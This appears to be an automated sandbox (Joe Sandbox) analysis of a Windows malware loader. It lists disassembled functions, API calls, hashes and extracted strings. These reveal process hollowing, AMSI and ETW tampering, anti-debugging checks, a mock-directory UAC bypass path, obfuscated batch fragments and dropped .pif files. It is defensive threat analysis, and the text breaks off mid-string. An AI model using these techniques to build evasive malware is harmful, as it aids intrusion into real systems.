Instruction ID: 424e101567ae36958a713661a9742a4210e6efadb78643fcd98ea09cb64af909
Opcode Fuzzy Hash: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
Instruction Fuzzy Hash: DC012979610208BFEB01EFA8DC41E9A77FEEB48710F5188A0F908D7A00DA34E915CF65

Function 02B37CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C

Strings

Ntdll, xrefs: 02B37D43
yromeMlautriVetirW, xrefs: 02B37D13

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
Instruction ID: 5d068c67dd69075e3ea53939c5cb3fa0a28e5a343968b4cd35cc7ed2045faac5
Opcode Fuzzy Hash: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
Instruction Fuzzy Hash: C10129B5650208BFEB02EF98DC41EAAB7FDEB4D710F518490B508E7A90CA30A915DF61

Function 02B384BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521

Strings

ntdll, xrefs: 02B38504
noitceSfOweiVpamnUtN, xrefs: 02B384D7

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
Instruction ID: 69fc646870e9092b993a3bdddb9d1549ecd64cb4deb4f9dfdd0ea1fbec644f1f
Opcode Fuzzy Hash: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
Instruction Fuzzy Hash: A4016275654304BFEB02EFA8DC41E5EB7BEEB49710F5288A0B40897A11DA34AA05CE21

Function 02B3D9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
NtDeleteFile.NTDLL(?), ref: 02B3DA99

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
Instruction ID: 1b2d0c54559cd3be78886de77d0b244fd6553f64d518f05bd122c25809ee05c3
Opcode Fuzzy Hash: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
Instruction Fuzzy Hash: C6016275948349BEEF06EBE0CA41BCD77BDAB44704F5045D2E360E6081DA74AB08CB21

Function 02B3DA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
NtDeleteFile.NTDLL(?), ref: 02B3DA99

Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
Instruction ID: 18942b3dffc62d91750dd9baa2dc03d894410d6f9356a24cfd5d7173708cf0fd
Opcode Fuzzy Hash: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
Instruction Fuzzy Hash: C0014F71A04309BAEB11EBE0CD42FCEB7BDEB08700F5045E1E614E2590EB74AB088A60

Function 02B36D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02B36CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19

CoCreateInstance.OLE32(?,00000000,00000005,02B36E2C,00000000,00000000,02B36DAB,?,00000000,02B36E1B), ref: 02B36D97

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
Instruction ID: a3673d327e5ae6c5dd63de9fef6e45ba355575fb2bb925006226a1eca47235a8
Opcode Fuzzy Hash: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
Instruction Fuzzy Hash: 60014230208314BEE716EF60CC2296FBBFDE749B10B9208B5F405D2650E6308D08C868

Function 02B3EC6C Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02B4AF99,?,?,?,000002F7,00000000,00000000), ref: 02B3ECA6

Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3

Part of subcall function 02B3EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
Part of subcall function 02B3EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4

Part of subcall function 02B3EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
Part of subcall function 02B3EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
Part of subcall function 02B3EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21

Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B

Part of subcall function 02B2C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C758C8,?,02B3FBF6,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession), ref: 02B2C2FB

Part of subcall function 02B3DBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
Part of subcall function 02B3DBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
Part of subcall function 02B3DBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
Part of subcall function 02B3DBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
Part of subcall function 02B3DBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D

Part of subcall function 02B27E34: GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F

Part of subcall function 02B27FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B42BDF,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0), ref: 02B27FD5

Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73

Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802

Part of subcall function 02B38704: LoadLibraryW.KERNEL32(amsi), ref: 02B3870D
Part of subcall function 02B38704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,02B4B328), ref: 02B449AF

Part of subcall function 02B3DA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
Part of subcall function 02B3DA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
Part of subcall function 02B3DA3C: NtDeleteFile.NTDLL(?), ref: 02B3DA99

MoveFileA.KERNEL32(00000000,00000000), ref: 02B44BAF
MoveFileA.KERNEL32(00000000,00000000), ref: 02B44C05

Strings

GET, xrefs: 02B418FA
NtQuerySystemInformation, xrefs: 02B4A099
NtDeviceIoControlFile, xrefs: 02B4A0A8
NtQueryDirectoryFile, xrefs: 02B4A0B7
[InternetShortcut], xrefs: 02B46490
RtlQueryProcessDebugInformation, xrefs: 02B4A0C6
dbgcore, xrefs: 02B4899B, 02B489AF
DllRegisterServer, xrefs: 02B3EFF9, 02B3F545
DlpNotifyPreDragDrop, xrefs: 02B49B70
NtWaitForSingleObject, xrefs: 02B49D9A
spp, xrefs: 02B4981C, 02B4984F, 02B4A4EC
NtMapViewOfSection, xrefs: 02B4A6A0
EnumServicesStatusA, xrefs: 02B4A0D5
CryptSIPGetSignedDataMsg, xrefs: 02B3F29F
Advapi, xrefs: 02B4A0DA, 02B4A0E9, 02B4A0F8, 02B4A107, 02B4A143, 02B4A152, 02B4A161
CreateProcessA, xrefs: 02B4A120
NtQueryInformationThread, xrefs: 02B4A607
SLLoadApplicationPolicies, xrefs: 02B4962B
GetProxyDllInfo, xrefs: 02B3EFCF
HotKey=, xrefs: 02B46629
C:\\Windows \\SysWOW64\\, xrefs: 02B43AC6, 02B43EDA
ScanBuffer, xrefs: 02B3EE6B, 02B3F1C3, 02B3F3ED, 02B3F954, 02B3FA61, 02B3FB79, 02B3FF4D, 02B400EB, 02B40291, 02B403B1, 02B40546, 02B4063E, 02B408A7, 02B40A4D, 02B40BE9, 02B40CFF, 02B40D8D, 02B410A1, 02B41342, 02B41453, 02B415F0, 02B4199B, 02B41AA7, 02B41CC5, 02B41DE2, 02B420FD, 02B4219E, 02B42312, 02B424D2, 02B427F4, 02B42BEB, 02B42E8A, 02B42F1B, 02B432D5, 02B434B7, 02B4362B, 02B437AE, 02B4382A, 02B439E1, 02B43BEB, 02B43E49, 02B4407B, 02B442BF, 02B44507, 02B447BD, 02B44923, 02B44AB8, 02B44DF0, 02B4512A, 02B45443, 02B457C3, 02B45AFC, 02B45DAE, 02B45FB3, 02B46119, 02B4628D, 02B46309, 02B46EAC, 02B46F3D, 02B4736D, 02B47500, 02B4765C, 02B47754, 02B47C71, 02B47F3E, 02B480E4, 02B48271, 02B48405, 02B48584, 02B487FB, 02B488F3, 02B48D0F, 02B48FE8, 02B4915C, 02B49392, 02B49424, 02B4975C, 02B49AFA, 02B4A029, 02B4A92F
C:\Users\Public\alpha.pif, xrefs: 02B44B2E
BCryptVerifySignature, xrefs: 02B3F34E, 02B499C9
BCryptRegisterProvider, xrefs: 02B3F3B4
NtOpenSection, xrefs: 02B4A63A
C:\\Users\\Public\\Libraries\\, xrefs: 02B44B5E, 02B44BB4, 02B458AF
FX.c, xrefs: 02B446F3
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02B3FE2F
VirtualAllocEx, xrefs: 02B4A22F
psapi, xrefs: 02B4A116
GetProcessMemoryInfo, xrefs: 02B4986B
Initialize, xrefs: 02B3ED3F, 02B3FCC1, 02B3FE55, 02B3FFF3, 02B40199, 02B4044E, 02B40AF1, 02B40F2D, 02B413D7, 02B414E1, 02B41BC8, 02B41EFA, 02B4221A, 02B4254E, 02B426FC, 02B42A55, 02B42E0E, 02B44FB6, 02B4534B, 02B45747, 02B4590C, 02B45B78, 02B45CB6, 02B45EBB, 02B46E30, 02B47AE8, 02B48AF5, 02B496E0, 02B49A7E, 02B49FAD, 02B4A367, 02B4A8B3
OpenProcess, xrefs: 02B4A295
NtOpenProcess, xrefs: 02B489D2
kernel32, xrefs: 02B4A213, 02B4A246, 02B4A279, 02B4A2AC, 02B4A2DF, 02B4A312, 02B4A345
SLGetEncryptedPIDEx, xrefs: 02B4A56E
NEO.c, xrefs: 02B4443D
mssip32, xrefs: 02B3F250, 02B3F283, 02B3F2B6, 02B498B5
EnumServicesStatusExA, xrefs: 02B4A0F3
FindCertsByIssuer, xrefs: 02B3F10E
UacScan, xrefs: 02B3EECF, 02B3F57E, 02B3F676, 02B3FC45, 02B4082B, 02B40E09, 02B4176B, 02B41E7E, 02B4308F, 02B43259, 02B433BA, 02B43533, 02B436B6, 02B43887, 02B43965, 02B43AF3, 02B43FFF, 02B443BC, 02B445F1, 02B452CF, 02B4583F, 02B45A04, 02B45D32, 02B45E3F, 02B4609D, 02B46195, 02B46D38, 02B470DA, 02B472F1, 02B47484, 02B476D8, 02B47B64, 02B47CED, 02B47E46, 02B47FEC, 02B48179, 02B4830D, 02B4848C, 02B48703, 02B48B71, 02B48D8B, 02B48F6C, 02B490E0, 02B49316, 02B4A186
C:\Windows\System32\, xrefs: 02B3F8AF, 02B470B3, 02B47DFB
NtOpenFile, xrefs: 02B4A805
advapi32, xrefs: 02B48987
CreateProcessAsUserA, xrefs: 02B4A13E
DllGetActivationFactory, xrefs: 02B3F512
EnumProcessModules, xrefs: 02B4A111
@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 02B44590
WinHttp.WinHttpRequest.5.1, xrefs: 02B417E1
RtlCreateQueryDebugBuffer, xrefs: 02B49E00
MiniDumpWriteDump, xrefs: 02B48996
sppwmi, xrefs: 02B4A51F
EtwEventWrite, xrefs: 02B4A86B
UacInitialize, xrefs: 02B3EF33, 02B3F5FA, 02B3FD3D, 02B43D51, 02B441C7, 02B449C0, 02B44C7C, 02B45032, 02B4551F, 02B47035, 02B48877, 02B48C93
wintrust, xrefs: 02B3F0BF, 02B3F0F2, 02B3F125
ScanString, xrefs: 02B3EDA3, 02B3F032, 02B3F147, 02B3F2D8, 02B3F469, 02B3F6F2, 02B3F833, 02B3FDB9, 02B409D1, 02B40B6D, 02B40FA9, 02B411C4, 02B41240, 02B4155D, 02B41883, 02B41B4C, 02B41F89, 02B423BA, 02B425CA, 02B42680, 02B429AF, 02B42AD1, 02B42D92, 02B431DD, 02B43CD5, 02B4414B, 02B44340, 02B44CF8, 02B44E92, 02B451D7, 02B4559B, 02B45C3A, 02B46420, 02B46597, 02B4664F, 02B46CBC, 02B47156, 02B475BD, 02B47BE0, 02B48687, 02B48A79, 02B48E62, 02B4921E, 02B4951C, 02B498D7, 02B49CBE, 02B49EB5, 02B4A45F
DlpGetArchiveFileTraceInfo, xrefs: 02B49BD6
EnumServicesStatusExW, xrefs: 02B4A102
LdrGetProcedureAddress, xrefs: 02B4A79F
CryptSIPVerifyIndirectData, xrefs: 02B3F26C, 02B4989E
WintrustAddActionID, xrefs: 02B3F0DB
NtSetSecurityObject, xrefs: 02B489BE
sppc, xrefs: 02B495A9, 02B495DC, 02B4960F, 02B49642, 02B4A552, 02B4A585
NtAlertResumeThread, xrefs: 02B49D34
RtlAllocateHeap, xrefs: 02B49D67, 02B49DCD
SLGetGenuineInformation, xrefs: 02B49592
psapi, xrefs: 02B49882
OpenSession, xrefs: 02B3ECDB, 02B3EE07, 02B3F7B7, 02B3F8D8, 02B3F9E5, 02B3FAFD, 02B3FED1, 02B4006F, 02B40215, 02B40335, 02B404CA, 02B405C2, 02B407AF, 02B40955, 02B40C83, 02B40EB1, 02B41025, 02B41148, 02B412C6, 02B4166C, 02B416EF, 02B41807, 02B4191F, 02B41A2B, 02B41C49, 02B41D66, 02B42005, 02B42081, 02B42296, 02B42436, 02B42778, 02B42933, 02B42B4D, 02B42C67, 02B42F97, 02B43436, 02B435AF, 02B43732, 02B43B6F, 02B43DCD, 02B43F07, 02B44243, 02B4448B, 02B4466D, 02B44741, 02B448A7, 02B44A3C, 02B44D74, 02B44F0E, 02B450AE, 02B45253, 02B453C7, 02B45617, 02B456CB, 02B45988, 02B45A80, 02B45F37, 02B46211, 02B46385, 02B4651B, 02B466CB, 02B46DB4, 02B46FB9, 02B471D2, 02B47275, 02B47408, 02B477D0, 02B47A6C, 02B47D69, 02B47EC2, 02B48068, 02B481F5, 02B48389, 02B48508, 02B4860B, 02B4877F, 02B489FD, 02B48BED, 02B48EDE, 02B49064, 02B4929A, 02B494A0, 02B49664, 02B49953, 02B49A02, 02B49C42, 02B49E39, 02B49F31, 02B4A3E3, 02B4A9AB
IconIndex=, xrefs: 02B464F5
URL=file:", xrefs: 02B4649F
DlpGetWebSiteAccess, xrefs: 02B49C09
FlushInstructionCache, xrefs: 02B4A2FB
UacUninitialize, xrefs: 02B42D16, 02B43013, 02B4310B, 02B438E9, 02B43F83
CryptSIPGetInfo, xrefs: 02B3F239
NtOpenObjectAuditAlarm, xrefs: 02B4896E
endpointdlp, xrefs: 02B49B87, 02B49BBA, 02B49BED, 02B49C20
bcrypt, xrefs: 02B3F365, 02B3F398, 02B3F3CB, 02B499E0
lld.SLITUTEN, xrefs: 02B43AB0
I_QueryTagInformation, xrefs: 02B48982
GZmMS1j, xrefs: 02B3ECB4
smartscreenps, xrefs: 02B3F4F6, 02B3F529, 02B3F55C
CreateProcessWithLogonW, xrefs: 02B4A15C
NtWriteVirtualMemory, xrefs: 02B4A7D2
LdrLoadDll, xrefs: 02B4A76C
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 02B44846
BCryptQueryProviderRegistration, xrefs: 02B3F381
CreateProcessAsUserW, xrefs: 02B4A14D, 02B4A16B
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02B43359
ntdll, xrefs: 02B48973, 02B489C3, 02B489D7, 02B49D4B, 02B49D7E, 02B49DB1, 02B49DE4, 02B49E17, 02B4A5B8, 02B4A5EB, 02B4A61E, 02B4A651, 02B4A684, 02B4A6B7, 02B4A6EA, 02B4A71D, 02B4A750, 02B4A783, 02B4A7B6, 02B4A7E9, 02B4A81C, 02B4A84F, 02B4A882
SxTracerGetThreadContextDebug, xrefs: 02B49805, 02B4A4D5
DllGetClassObject, xrefs: 02B3EFA8, 02B3F4DF, 02B49838, 02B4A508
ieproxy, xrefs: 02B3EFB9, 02B3EFE0, 02B3F010
.url, xrefs: 02B454D3
CreateProcessW, xrefs: 02B4A12F
C:\Users\Public\, xrefs: 02B4317B, 02B454C8, 02B4673B
C:\Users\Public\aken.pif, xrefs: 02B44B49
SLIsGenuineLocalEx, xrefs: 02B495F8
DlpCheckIsCloudSyncApp, xrefs: 02B49BA3
WriteVirtualMemory, xrefs: 02B4A2C8
SLGetSLIDList, xrefs: 02B495C5
SetUnhandledExceptionFilter, xrefs: 02B4A32E
VirtualAlloc, xrefs: 02B4A1FC
EtwEventWriteEx, xrefs: 02B4A838
TrustOpenStores, xrefs: 02B3F0A8
SLGatherMigrationBlob, xrefs: 02B4A53B
tquery, xrefs: 02B497E9
NtGetWriteWatch, xrefs: 02B4A5A1
NtAccessCheck, xrefs: 02B4A739
http, xrefs: 02B415CD
Ntdll, xrefs: 02B4A09E, 02B4A0AD, 02B4A0BC, 02B4A0CB
NtReadVirtualMemory, xrefs: 02B4A6D3
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02B436A0
VirtualProtect, xrefs: 02B4A262
NtQuerySecurityObject, xrefs: 02B4A706
NtCreateSection, xrefs: 02B4A66D
NtQueryVirtualMemory, xrefs: 02B4A5D4
Kernel32, xrefs: 02B4A125, 02B4A134, 02B4A170
MiniDumpReadDumpStream, xrefs: 02B489AA
EnumServicesStatusW, xrefs: 02B4A0E4
RetailTracerEnable, xrefs: 02B497D2
sys.thgiseurt, xrefs: 02B43EC4

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreate